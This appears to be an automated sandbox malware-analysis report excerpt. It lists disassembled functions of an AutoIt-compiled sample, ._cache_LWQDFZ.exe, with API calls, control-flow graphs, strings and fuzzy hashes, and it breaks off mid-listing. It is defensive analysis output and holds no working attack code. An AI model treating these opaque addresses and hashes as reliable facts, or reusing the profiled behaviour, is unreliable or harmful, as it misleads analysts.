                                                                                                                        • Part of subcall function 003C010A: __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                      • _wcscpy.LIBCMT ref: 003BEABE
                                                                                                                        • Part of subcall function 003BEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,003BEADA,?,?), ref: 003BEB27
                                                                                                                      • _wcscat.LIBCMT ref: 004132FC
                                                                                                                      • _wcscat.LIBCMT ref: 00413334
                                                                                                                      • _wcsncpy.LIBCMT ref: 00413370
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                      • String ID: '/>$Include$\$"F
                                                                                                                      • API String ID: 1213536620-2635766330
                                                                                                                      • Opcode ID: b1f7218ec47a9b55e46f8e8a33d80126404f5e5d2be83d84625e79987a683f5b
                                                                                                                      • Instruction ID: de9a1526af91306fcc078ccb827c0075949252600ad8ad923a6c9c61a113a2a6
                                                                                                                      • Opcode Fuzzy Hash: b1f7218ec47a9b55e46f8e8a33d80126404f5e5d2be83d84625e79987a683f5b
                                                                                                                      • Instruction Fuzzy Hash: 0E518FB2404740ABC315EF65EE95C9BB7E8FB49300B40452EF945C7261EBF49A84CB6B
                                                                                                                      Function 003A4257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,00000000,00000001,00000000), ref: 003A428C
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 003C1BC7: __wcsicmp_l.LIBCMT ref: 003C1C50
                                                                                                                      • _wcscpy.LIBCMT ref: 003A43C0
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0041214E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_LWQDFZ.exe$CMDLINE$CMDLINERAW
                                                                                                                      • API String ID: 861526374-1764967116
                                                                                                                      • Opcode ID: b3d41654e1df0dcc30a07f29df1aec6a1bf15caf23d574407fac775a0e60a957
                                                                                                                      • Instruction ID: 0ede0f420bb24eaa1a337b9ef0f8978257a36180fe0eb9da80647f90741a39e9
                                                                                                                      • Opcode Fuzzy Hash: b3d41654e1df0dcc30a07f29df1aec6a1bf15caf23d574407fac775a0e60a957
                                                                                                                      • Instruction Fuzzy Hash: 75818676800119AACB06EBE0DD52EEFB77CEF5A350F10001AF541BB191EFB46A44CB66
                                                                                                                      Function 003E78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1143 3e78ee-3e7911 WSAStartup 1144 3e7917-3e7938 gethostname gethostbyname 1143->1144 1145 3e79b1-3e79bd call 3c1943 1143->1145 1144->1145 1146 3e793a-3e7941 1144->1146 1154 3e79be-3e79c1 1145->1154 1148 3e794e-3e7950 1146->1148 1149 3e7943 1146->1149 1152 3e7952-3e795f call 3c1943 1148->1152 1153 3e7961-3e79a6 call 3bfaa0 inet_ntoa call 3c3220 call 3e8553 call 3c1943 call 3c017e 1148->1153 1151 3e7945-3e794c 1149->1151 1151->1148 1151->1151 1159 3e79a9-3e79af WSACleanup 1152->1159 1153->1159 1159->1154
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                      • Opcode ID: dc2c1ffb43c844bde0f5b98dacb86e0e0e66d704450bd3ae64c1694073e2a903
                                                                                                                      • Instruction ID: 380bf21324b90588d1382350e2c2625faf93c2950b08674f7b401e4e0076402b
                                                                                                                      • Opcode Fuzzy Hash: dc2c1ffb43c844bde0f5b98dacb86e0e0e66d704450bd3ae64c1694073e2a903
                                                                                                                      • Instruction Fuzzy Hash: 8F110531A08125AFCB26A7719C49FDA776CDF41720F100179F405D60D2EF74DA818BA4
                                                                                                                      Function 003A30A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 003A30B0
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 003A30BF
                                                                                                                      • LoadIconW.USER32(00000063), ref: 003A30D5
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 003A30E7
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 003A30F9
                                                                                                                        • Part of subcall function 003A318A: LoadImageW.USER32(003A0000,00000063,00000001,00000010,00000010,00000000), ref: 003A31AE
                                                                                                                      • RegisterClassExW.USER32(?), ref: 003A3167
                                                                                                                        • Part of subcall function 003A2F58: GetSysColorBrush.USER32(0000000F), ref: 003A2F8B
                                                                                                                        • Part of subcall function 003A2F58: RegisterClassExW.USER32(00000030), ref: 003A2FB5
                                                                                                                        • Part of subcall function 003A2F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 003A2FC6
                                                                                                                        • Part of subcall function 003A2F58: LoadIconW.USER32(000000A9), ref: 003A3009
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 2880975755-4155596026
                                                                                                                      • Opcode ID: c18e1702ac1ebcf22856316798610b9e16761c3ce4b543bfcedab6113d2fb555
                                                                                                                      • Instruction ID: 3d5d22a10f609c07bd4d3076863b2a71cf2f2e218ea56ee8d08aff4dd76e875e
                                                                                                                      • Opcode Fuzzy Hash: c18e1702ac1ebcf22856316798610b9e16761c3ce4b543bfcedab6113d2fb555
                                                                                                                      • Instruction Fuzzy Hash: C62141B0E00304AFCB11DFA9EC4AA99BFF5FB49310F14413AE614A72B1E7B545449F9A
                                                                                                                      Function 003FB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1342 3fb74b-3fb7ac VariantInit call 3aca8e CoInitialize 1345 3fb7ae CoUninitialize 1342->1345 1346 3fb7b4-3fb7c7 call 3bd5f6 1342->1346 1345->1346 1349 3fb7c9-3fb7d0 call 3aca8e 1346->1349 1350 3fb7d5-3fb7dc 1346->1350 1349->1350 1352 3fb7de-3fb805 call 3a84a6 call 3da857 1350->1352 1353 3fb81b-3fb85b call 3a84a6 call 3bf885 1350->1353 1352->1353 1362 3fb807-3fb816 call 3fc235 1352->1362 1363 3fb9d3-3fba17 SetErrorMode CoGetInstanceFromFile 1353->1363 1364 3fb861-3fb86e 1353->1364 1379 3fbad0-3fbae3 VariantClear 1362->1379 1368 3fba1f-3fba3a CoGetObject 1363->1368 1369 3fba19-3fba1d 1363->1369 1366 3fb8a8-3fb8b6 GetRunningObjectTable 1364->1366 1367 3fb870-3fb881 call 3bd5f6 1364->1367 1371 3fb8b8-3fb8c9 1366->1371 1372 3fb8d5-3fb8e8 call 3fc235 1366->1372 1387 3fb883-3fb88d call 3acdb4 1367->1387 1388 3fb8a0 1367->1388 1375 3fba3c 1368->1375 1376 3fbab5-3fbac5 call 3fc235 SetErrorMode 1368->1376 1374 3fba40-3fba47 SetErrorMode 1369->1374 1392 3fb8ed-3fb8fc 1371->1392 1393 3fb8cb-3fb8d0 1371->1393 1389 3fbac7-3fbacb call 3a5cd3 1372->1389 1378 3fba4b-3fba51 1374->1378 1375->1374 1376->1389 1383 3fbaa8-3fbaab 1378->1383 1384 3fba53-3fba55 1378->1384 1383->1376 1390 3fba8d-3fbaa6 call 3ea6f6 1384->1390 1391 3fba57-3fba78 call 3dac4b 1384->1391 1387->1388 1402 3fb88f-3fb89e call 3acdb4 1387->1402 1388->1366 1389->1379 1390->1389 1391->1390 1404 3fba7a-3fba83 1391->1404 1401 3fb907-3fb91b 1392->1401 1393->1372 1407 3fb9bb-3fb9d1 1401->1407 1408 3fb921-3fb925 1401->1408 1402->1366 1404->1390 1407->1378 1408->1407 1410 3fb92b-3fb940 1408->1410 1413 3fb9a2-3fb9ac 1410->1413 1414 3fb942-3fb957 1410->1414 1413->1401 1414->1413 1418 3fb959-3fb983 call 3dac4b 1414->1418 1422 3fb985-3fb98d 1418->1422 1423 3fb994-3fb99e 1418->1423 1424 3fb98f-3fb990 1422->1424 1425 3fb9b1-3fb9b6 1422->1425 1423->1413 1424->1423 1425->1407
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003FB777
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003FB7A4
                                                                                                                      • CoUninitialize.COMBASE ref: 003FB7AE
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 003FB8AE
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 003FB9DB
                                                                                                                      • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 003FBA0F
                                                                                                                      • CoGetObject.OLE32(?,00000000,0042D91C,?), ref: 003FBA32
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 003FBA45
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003FBAC5
                                                                                                                      • VariantClear.OLEAUT32(0042D91C), ref: 003FBAD5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2395222682-0
                                                                                                                      • Opcode ID: 43fb995df30d7be46a8144bbef12e8229a4675c9385b5a7ed8d529d3880fe258
                                                                                                                      • Instruction ID: 6530296193b004581b3020cdaab5ed97aeb3a28a987b9377e57e5cfd517ea89b
                                                                                                                      • Opcode Fuzzy Hash: 43fb995df30d7be46a8144bbef12e8229a4675c9385b5a7ed8d529d3880fe258
                                                                                                                      • Instruction Fuzzy Hash: 57C124B1608349AFC701DF68C88496BB7E9FF89348F00495DFA8A9B251DB71ED05CB52
                                                                                                                      Function 003A2F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 003A2F8B
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 003A2FB5
                                                                                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 003A2FC6
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 003A3009
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 975902462-1005189915
                                                                                                                      • Opcode ID: 855557896272267f05d4fd86b120f2fee6947a15fb9e2b3d5885ebe11ac97ad0
                                                                                                                      • Instruction ID: 36a55a4607ed4d3764d5b1f2fc1d458b12ccc8b14be70af30ede7aae2a368026
                                                                                                                      • Opcode Fuzzy Hash: 855557896272267f05d4fd86b120f2fee6947a15fb9e2b3d5885ebe11ac97ad0
                                                                                                                      • Instruction Fuzzy Hash: 6D21E3B5E00308AFDB10AFA4E849BCDBBF4FB08704F10412AF611A72A0E7B44145CF9A
                                                                                                                      Function 004023C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1431 4023c5-402426 call 3c1970 1434 402452-402456 1431->1434 1435 402428-40243b call 3acdb4 1431->1435 1436 402458-402468 call 3acdb4 1434->1436 1437 40249d-4024a3 1434->1437 1446 402488 1435->1446 1447 40243d-402450 call 3acdb4 1435->1447 1450 40246b-402484 call 3acdb4 1436->1450 1441 4024a5-4024a8 1437->1441 1442 4024b8-4024be 1437->1442 1448 4024ab-4024b0 call 3acdb4 1441->1448 1443 4024c0 1442->1443 1444 4024c8-4024e2 call 3a84a6 call 3a3bcf 1442->1444 1443->1444 1464 4025a1-4025a9 1444->1464 1465 4024e8-402541 call 3a84a6 call 3a3bcf call 3a84a6 call 3a3bcf call 3a84a6 call 3a3bcf 1444->1465 1451 40248b-40248f 1446->1451 1447->1450 1448->1442 1450->1437 1463 402486 1450->1463 1456 402491-402497 1451->1456 1457 402499-40249b 1451->1457 1456->1448 1457->1437 1457->1442 1463->1451 1466 4025d3-402601 GetCurrentDirectoryW call 3c010a GetCurrentDirectoryW 1464->1466 1467 4025ab-4025c6 call 3a84a6 call 3a3bcf 1464->1467 1511 402543-40255e call 3a84a6 call 3a3bcf 1465->1511 1512 40256f-40259f GetSystemDirectoryW call 3c010a GetSystemDirectoryW 1465->1512 1476 402605 1466->1476 1467->1466 1481 4025c8-4025d1 call 3c18fb 1467->1481 1479 402609-40260d 1476->1479 1482 40263e-40264e call 3e9a8f 1479->1482 1483 40260f-402639 call 3aca8e * 3 1479->1483 1481->1466 1481->1482 1495 402650-40269b call 3ea17a call 3ea073 call 3ea102 1482->1495 1496 4026aa 1482->1496 1483->1482 1500 4026ac-4026bb 1495->1500 1529 40269d-4026a8 1495->1529 1496->1500 1501 4026c1-4026f1 call 3dbc90 call 3c18fb 1500->1501 1502 40274c-402768 CreateProcessW 1500->1502 1525 4026f3-4026f8 1501->1525 1526 4026fa-40270a call 3c18fb 1501->1526 1508 40276b-40277e call 3c017e * 2 1502->1508 1532 402780-4027b8 call 3ed7e4 GetLastError call 3a7ba9 call 3b2570 1508->1532 1533 4027bd-4027c9 CloseHandle 1508->1533 1511->1512 1537 402560-402569 call 3c18fb 1511->1537 1512->1476 1525->1525 1525->1526 1540 402713-402723 call 3c18fb 1526->1540 1541 40270c-402711 1526->1541 1529->1500 1548 40283e-40284f call 3e9b29 1532->1548 1534 4027f5-4027f9 1533->1534 1535 4027cb-4027f0 call 3e9d09 call 3ea37f call 402881 1533->1535 1542 402807-402811 1534->1542 1543 4027fb-402805 1534->1543 1535->1534 1537->1479 1537->1512 1561 402725-40272a 1540->1561 1562 40272c-40274a call 3c017e * 3 1540->1562 1541->1540 1541->1541 1550 402813 1542->1550 1551 402819-402838 call 3b2570 CloseHandle 1542->1551 1543->1548 1550->1551 1551->1548 1561->1561 1561->1562 1562->1508
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004023E6
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00402579
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040259D
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004025DD
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004025FF
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00402760
                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00402792
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004027C1
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402838
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4090791747-0
                                                                                                                      • Opcode ID: 0cb483356d5292ea5236ca782c680aeaec9a36802ca6a3a0f0b628db4de1ce52
                                                                                                                      • Instruction ID: 7221b88af38e1d17e7d0edc9b6a63f844d28fb46baa693b8c27ce25627a6abc3
                                                                                                                      • Opcode Fuzzy Hash: 0cb483356d5292ea5236ca782c680aeaec9a36802ca6a3a0f0b628db4de1ce52
                                                                                                                      • Instruction Fuzzy Hash: ADD1BD316042019FC716EF24C985B6ABBE1AF89310F14846EF885AF2E2DB74DC41CB56
                                                                                                                      Function 003FC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1572 3fc8b7-3fc8f1 1573 3fccfb-3fccff 1572->1573 1574 3fc8f7-3fc8fa 1572->1574 1575 3fcd04-3fcd05 1573->1575 1574->1573 1576 3fc900-3fc903 1574->1576 1577 3fcd06 call 3fc235 1575->1577 1576->1573 1578 3fc909-3fc912 call 3fcff8 1576->1578 1582 3fcd0b-3fcd0f 1577->1582 1583 3fc925-3fc92e call 3ebe14 1578->1583 1584 3fc914-3fc920 1578->1584 1587 3fc934-3fc93a 1583->1587 1588 3fcc61-3fcc6c call 3ad2c0 1583->1588 1584->1577 1589 3fc93c-3fc93e 1587->1589 1590 3fc940 1587->1590 1596 3fcc6e-3fcc72 1588->1596 1597 3fcca9-3fccb4 call 3ad2c0 1588->1597 1592 3fc942-3fc94a 1589->1592 1590->1592 1594 3fccec-3fccf4 1592->1594 1595 3fc950-3fc967 call 3dabf3 1592->1595 1594->1573 1607 3fc969-3fc96e 1595->1607 1608 3fc973-3fc97f 1595->1608 1600 3fcc78 1596->1600 1601 3fcc74-3fcc76 1596->1601 1597->1594 1606 3fccb6-3fccba 1597->1606 1604 3fcc7a-3fcc98 call 3bd6b4 call 3e97b6 1600->1604 1601->1604 1623 3fcc99-3fcca7 call 3ed7e4 1604->1623 1610 3fccbc-3fccbe 1606->1610 1611 3fccc0 1606->1611 1607->1575 1612 3fc9ce-3fc9f9 call 3bfa89 1608->1612 1613 3fc981-3fc98d 1608->1613 1617 3fccc2-3fccea call 3bd6b4 call 3e503c call 3b2570 1610->1617 1611->1617 1624 3fc9fb-3fca16 call 3bac65 1612->1624 1625 3fca18-3fca1a 1612->1625 1613->1612 1614 3fc98f-3fc99c call 3da8c8 1613->1614 1622 3fc9a1-3fc9a6 1614->1622 1617->1623 1622->1612 1628 3fc9a8-3fc9af 1622->1628 1623->1582 1631 3fca1d-3fca24 1624->1631 1625->1631 1635 3fc9be-3fc9c5 1628->1635 1636 3fc9b1-3fc9b8 1628->1636 1632 3fca26-3fca30 1631->1632 1633 3fca52-3fca59 1631->1633 1639 3fca32-3fca48 call 3da25b 1632->1639 1642 3fcadf-3fcaec 1633->1642 1643 3fca5f-3fca66 1633->1643 1635->1612 1644 3fc9c7 1635->1644 1636->1635 1641 3fc9ba 1636->1641 1654 3fca4a-3fca50 1639->1654 1641->1635 1645 3fcaee-3fcaf8 1642->1645 1646 3fcafb-3fcb28 VariantInit call 3c1970 1642->1646 1643->1642 1649 3fca68-3fca7b 1643->1649 1644->1612 1645->1646 1657 3fcb2d-3fcb30 1646->1657 1658 3fcb2a-3fcb2b 1646->1658 1652 3fca7c-3fca84 1649->1652 1655 3fca86-3fcaa3 VariantClear 1652->1655 1656 3fcad1-3fcada 1652->1656 1654->1633 1659 3fcabc-3fcacc 1655->1659 1660 3fcaa5-3fcab9 SysAllocString 1655->1660 1656->1652 1661 3fcadc 1656->1661 1662 3fcb31-3fcb43 1657->1662 1658->1662 1659->1656 1663 3fcace 1659->1663 1660->1659 1661->1642 1664 3fcb47-3fcb4c 1662->1664 1663->1656 1665 3fcb4e-3fcb52 1664->1665 1666 3fcb8a-3fcb8c 1664->1666 1667 3fcb54-3fcb86 1665->1667 1668 3fcba1-3fcba5 1665->1668 1669 3fcb8e-3fcb95 1666->1669 1670 3fcbb4-3fcbd5 call 3ed7e4 call 3ea6f6 1666->1670 1667->1666 1671 3fcba6-3fcbaf call 3fc235 1668->1671 1669->1668 1673 3fcb97-3fcb9f 1669->1673 1678 3fcc41-3fcc50 VariantClear 1670->1678 1682 3fcbd7-3fcbe0 1670->1682 1671->1678 1673->1671 1680 3fcc5a-3fcc5c 1678->1680 1681 3fcc52-3fcc55 call 3e1693 1678->1681 1680->1582 1681->1680 1684 3fcbe2-3fcbef 1682->1684 1685 3fcc38-3fcc3f 1684->1685 1686 3fcbf1-3fcbf8 1684->1686 1685->1678 1685->1684 1687 3fcbfa-3fcc0a 1686->1687 1688 3fcc26-3fcc2a 1686->1688 1687->1685 1691 3fcc0c-3fcc14 1687->1691 1689 3fcc2c-3fcc2e 1688->1689 1690 3fcc30 1688->1690 1692 3fcc32-3fcc33 call 3ea6f6 1689->1692 1690->1692 1691->1688 1693 3fcc16-3fcc1c 1691->1693 1692->1685 1693->1688 1695 3fcc1e-3fcc24 1693->1695 1695->1685 1695->1688
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
